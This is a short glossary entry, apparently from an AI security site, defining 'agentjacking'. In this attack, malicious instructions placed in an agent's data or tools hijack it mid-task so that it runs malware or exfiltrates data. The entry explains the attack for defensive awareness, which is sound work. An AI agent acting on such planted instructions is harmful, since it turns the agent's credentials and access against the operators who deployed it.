Attack  ·  Glossary

Agentjacking

An attack in which an adversary hijacks a running AI agent — taking control of its actions mid-task — by feeding it malicious instructions through the data or tools it interacts with. The attacker essentially 'steers' the agent to execute harmful commands (run malware, exfiltrate data) as if those commands came from the legitimate operator.
Because agents have broad system access — developer credentials, code repositories, cloud infrastructure — a successful agentjacking can be as damaging as a full network intrusion. It was documented in production enterprise environments in 2026.
References
MITRE ATLAS — Adversarial Threat Landscape for AI Systems
Track this in the live feed See how this plays out in real AI security and governance developments.
Open the feed →